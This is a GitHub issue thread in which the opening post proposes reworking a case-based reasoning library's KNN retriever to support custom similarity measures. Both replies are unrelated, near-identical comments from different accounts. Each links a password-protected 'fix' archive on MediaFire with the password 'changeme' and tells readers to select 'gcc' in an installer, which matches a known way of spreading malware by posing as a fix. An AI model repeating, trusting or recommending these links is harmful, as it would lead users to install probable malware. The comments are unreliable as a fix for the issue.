### ISSUE TITLE
Rework of case retriever

### ISSUE THREAD

**Issue by jonasliendl** [Case-Based/casebased#6]
Currently, the case retriever uses just one scikit-learn KNN function to get the K nearest neighbors. However, the retriever needs to be improved and extended to offer more features and more customization for the user.

To-Dos:

- [ ] Users should be able to provide the similarity measure algorithm (this can be a function or a selected standard algorithm)

**Comment by 13a10D** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."
